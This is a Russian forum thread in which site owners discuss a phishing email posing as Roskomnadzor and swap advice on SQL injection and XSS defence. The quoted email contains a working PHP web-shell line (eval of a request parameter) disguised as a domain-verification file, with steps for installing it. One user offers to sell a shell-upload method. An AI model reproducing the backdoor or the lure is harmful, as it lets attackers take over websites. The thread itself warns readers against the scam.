Всё обо всём

взломщик

47 52
user avatar
10 лет назад
Сообщений: 264
10 лет назад
Мой знакомый прислал интересную информацию \":wink:\"
И так на почту многим должно придти следующая информация

\"\" Показать / Скрыть текстВы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени webof-sar.ru в сети «Интернет».

По истечению 72 часов, Вы, администратор доменного имени webof-sar.ru НЕ прошли верификацию, Ваш сайт webof-sar.ru может быть внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

В случае, если Вы выполнили необходимые требования, но наш робот не подтвердил верификацию, проверьте следующее:

1) Убедитесь в наличии папки reestr и файла reestr000000078827135647.php, содержащий следующий текст:

< ?php /*Подтверждение доменного имени webof-sar.ru roskomnadzor-verification = 54re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a / eval(stripslashes($_REQUEST[roskomnadzor])); / roskomnadzor-verification4 = 54re00ds92167049999901257a */ ?>

2) В коде< ?php необходимо убрать пробел между < и ?php , в конце текста убрать пробел между ? и >, как на картинке ниже:
Все это лохатрон... НЕ в коем случае не видитесь....!
Ответ на: BelarusBUX.com · 10 лет назад
“Мой знакомый прислал интересную информацию <!--smile:wink--><img style=\"vertical-align: middle;border: none;\" alt=\":wink:\" src=\"https://sfb.su/engine/data/emoticons/wink.gif\" /><!--/smile--> <b...”
user avatar
14 лет назад
Сообщений: 257
10 лет назад
Мне тож такие файлы заливали))) На твоём старом движке ещё....
Так что скорее всего дыра в каком то из старых твоих файлов.
Ответ на: nanotek · 10 лет назад
“Мне тож такие файлы заливали))) На твоём старом движке ещё....<br />Так что скорее всего дыра в каком то из старых твоих файлов.”
user avatar
15 лет назад
Сообщений: 85
10 лет назад
со стороннего ресурса базу обновляю. Но видать проблема не в этом!
Ответ на: SpawN · 10 лет назад
“со стороннего ресурса базу обновляю. Но видать проблема не в этом!”
user avatar
14 лет назад
Сообщений: 164
10 лет назад
BelarusBUX.com,
2 раза такое приходило, хороший способ ))
Ответ на: WiNNeR_tig · 10 лет назад
“<b>BelarusBUX.com</b>,<br />2 раза такое приходило, хороший способ ))”
user avatar
15 лет назад
Сообщений: 85
10 лет назад
nanotek,
\":facepalm:\" да я уже все через поиски перелопатил. Самой заливки файлов нигде нет, кроме аваторок
Ответ на: SpawN · 10 лет назад
“<b>nanotek</b>,<br /><!--smile:facepalm--><img style=\"vertical-align: middle;border: none;\" alt=\":facepalm:\" src=\"https://sfb.su/engine/data/emoticons/facepalm.gif\" /><!--/smile--> да я уже все...”
user avatar
14 лет назад
Сообщений: 257
10 лет назад
SpawN,
Может форум?

WiNNeR_tig,
А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (
Ответ на: nanotek · 10 лет назад
“<b>SpawN</b>,<br />Может форум?<br /><br /><b>WiNNeR_tig</b>,<br />А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (”
user avatar
15 лет назад
Сообщений: 88
10 лет назад
SpawN, а кто хостер?

Цитата: Pretorianлоги загрузки на сервер
по дате загруженных файлов можно в логах смотреть...
Ответ на: Sergeych · 10 лет назад
“<b>SpawN</b>, а кто хостер?<br /><br /><!--QuoteBegin Pretorian --><div class=\"title_quote\">Цитата: Pretorian</div><div class=\"quote\"><!--QuoteEBegin-->логи загрузки на сервер<!--QuoteEnd--></div>...”
user avatar
15 лет назад
Сообщений: 663
10 лет назад
Прикрути защиту касого убери все echo о *уякинг атемптах и вместо них припиши логи какой файл пытались атаковать и прочее, парси все post cookies и headers

В конце концов вычисли ip кулхацкера и пиши в логи все его действия от входа до залития кода. Прикрути к всем post стрипслеш, скорее всего с помощью sql inj делают select into outfile
Ответ на: steam · 10 лет назад
“Прикрути защиту касого убери все echo о *уякинг атемптах и вместо них припиши логи какой файл пытались атаковать и прочее, парси все post cookies и headers<br /><br />В конце концов вычисли ip кулхацк...”
user avatar
10 лет назад
Сообщений: 264
10 лет назад
Цитата: steamВ конце концов вычисли ip кулхацкера
Все прекрасно знают. Что обнаружить IP это толку мало... если там хрендель реально с руками и с головой то он работает через туннель... \":fellow:\"
Ответ на: BelarusBUX.com · 10 лет назад
“<!--QuoteBegin steam --><div class=\"title_quote\">Цитата: steam</div><div class=\"quote\"><!--QuoteEBegin-->В конце концов вычисли ip кулхацкера<!--QuoteEnd--></div><!--QuoteEEnd--><br />Все прекрасн...”
user avatar
13 лет назад
Сообщений: 1859
10 лет назад
потому и нет логов о заливке файла так как он вовсе не заливается а создается путем записи вредосного кода в базу через инекцию, в ячейку которая выводится в месте где нет фильтрации, и в результате код вредосный срабатывает как код а не как текст, и само собой создает шел, и удаляется с базы. Это мое мнение, хз как там, держите в курсе что там...
Ответ на: Pretorian · 10 лет назад
“потому и нет логов о заливке файла так как он вовсе не заливается а создается путем записи вредосного кода в базу через инекцию, в ячейку которая выводится в месте где нет фильтрации, и в результате к...”
user avatar
15 лет назад
Сообщений: 47
10 лет назад
Pretorian,
верно такое может быть.
SpawN,
Не в обиду но почти во всех скриптах что я смотрел спартака твой и тд и тп все обрабатывают данные через всякие ещё старые суфастовские функции вырезая вручную кавычки и тд и тп.
Проверь чтобы у тебя все данные которые ты передаёшь в БД проходили через mysql_real_escape_string а целочисленные intval или int.
литеральные константы обрамляй апострофами.
А перед выводом инфы на экран пропускай через htmlspecialchars.
В принципе всё от xss и sql inj. Вырезать вручную своими самодельными функциями ничего не надо. (ну за исключением каких то моментов когда линку надо вывести на экран то тут уже да).

Даже если ты уверен что иньекцию невозможна ты всё равно должен обрабатывать уже непосредственно в своём запросе данные с помощью mysql_real_escape_string.
Допустим ты логин чекаешь регуляркой preg_match("/^[a-zA-Z0-9\\\\_]+$/", $username
но при этом уже в самом запросе обрабатывай его ещё раз через mysql_real_escape_string
SET `username`='". mysql_real_escape_string($username) ."'

SpawN,
скинь мне на почту файлы свои загрузки: аватаров и что ещё загружаеться на сервак.
Ответ на: VELIK505 · 10 лет назад
“<b>Pretorian</b>,<br />верно такое может быть.<br /><b>SpawN</b>,<br />Не в обиду но почти во всех скриптах что я смотрел спартака твой и тд и тп все обрабатывают данные через всякие ещё старые суфаст...”
user avatar
15 лет назад
Сообщений: 663
10 лет назад
BelarusBUX.com,
А я и не говорил что надо самого кренделя по айпишнику вычислять, это удел школоты и отдела К, айпишник нужен чтобы отфильтровать куда этот крендель по сайту перемещается и вычислить тем самым потенциальные файлы с дырами, сузить поиск
Ответ на: steam · 10 лет назад
“<b>BelarusBUX.com</b>,<br />А я и не говорил что надо самого кренделя по айпишнику вычислять, это удел школоты и отдела К, айпишник нужен чтобы отфильтровать куда этот крендель по сайту перемещается и...”
user avatar
13 лет назад
Сообщений: 223
10 лет назад
Цитата: SpawN Купи у меня скрипт, сделай правильный выбор! Купить скрипт!

\":lol:\"
Ответ на: moskit · 10 лет назад
“<!--QuoteBegin SpawN --><div class=\"title_quote\">Цитата: SpawN</div><div class=\"quote\"><!--QuoteEBegin--> Купи у меня скрипт, сделай правильный выбор! Купить скрипт!<!--QuoteEnd--></div><!--QuoteE...”
user avatar
13 лет назад
Сообщений: 1859
10 лет назад
нашли причину? Если можно в личку, что бы школота не училась ломать
Ответ на: Pretorian · 10 лет назад
“нашли причину? Если можно в личку, что бы школота не училась ломать”
user avatar
15 лет назад
Сообщений: 85
10 лет назад
нет. причину не нашли
Ответ на: SpawN · 10 лет назад
“нет. причину не нашли”
user avatar
14 лет назад
Сообщений: 257
10 лет назад
Цитата: VELIK505mysql_real_escape_string
Дело говорит) Теперь пол своего движка надо немного переделать)
Ответ на: nanotek · 10 лет назад
“<!--QuoteBegin VELIK505 --><div class=\"title_quote\">Цитата: VELIK505</div><div class=\"quote\"><!--QuoteEBegin-->mysql_real_escape_string<!--QuoteEnd--></div><!--QuoteEEnd--><br />Дело говорит) Тепе...”
user avatar
13 лет назад
Сообщений: 317
10 лет назад
Цитата: Pretorianнашли причину? Если можно в личку, что бы школота не училась ломать
Какой же ты жалкий. Это тебе можно причину, а школоте нельзя? Да если бы в своё время не алекс, который рассказал как можно sql inj реализовать на сеоедите, огромное количество школоты не пошлобы ломать буксы и находить дыры в других(!!!) местах.

Но повторюсь. Есть отличный вариант, через который можно залить шелл. 100 баксов цена
Ответ на: Misha · 10 лет назад
“<!--QuoteBegin Pretorian --><div class=\"title_quote\">Цитата: Pretorian</div><div class=\"quote\"><!--QuoteEBegin-->нашли причину? Если можно в личку, что бы школота не училась ломать<!--QuoteEnd--><...”
user avatar
15 лет назад
Сообщений: 663
10 лет назад
Misha,
А ты возьми и выложи статьёй)
Ответ на: steam · 10 лет назад
“<b>Misha</b>,<br />А ты возьми и выложи статьёй)”
user avatar
13 лет назад
Сообщений: 8
10 лет назад
Цитата: steamА ты возьми и выложи статьёй)Человек на этом деньги зарабатывает.
Ответ на: inter · 10 лет назад
“<!--QuoteBegin steam --><div class=\"title_quote\">Цитата: steam</div><div class=\"quote\"><!--QuoteEBegin-->А ты возьми и выложи статьёй)<!--QuoteEnd--></div><!--QuoteEEnd-->Человек на этом деньги за...”
user avatar
15 лет назад
Сообщений: 62
10 лет назад
Цитата: ZKolyaNZвообще паук плати за тестирования своего скрипта и все, не ломай комедию, сбивай деньги с алмаза и все. ибо его скрипт тоже с багом и деньги и оттудова уходят хорошо сейчас ;)

Хорошо сказал...
Ответ на: trdnepr · 10 лет назад
“<!--QuoteBegin ZKolyaNZ --><div class=\"title_quote\">Цитата: ZKolyaNZ</div><div class=\"quote\"><!--QuoteEBegin-->вообще паук плати за тестирования своего скрипта и все, не ломай комедию, сбивай день...”
Ответить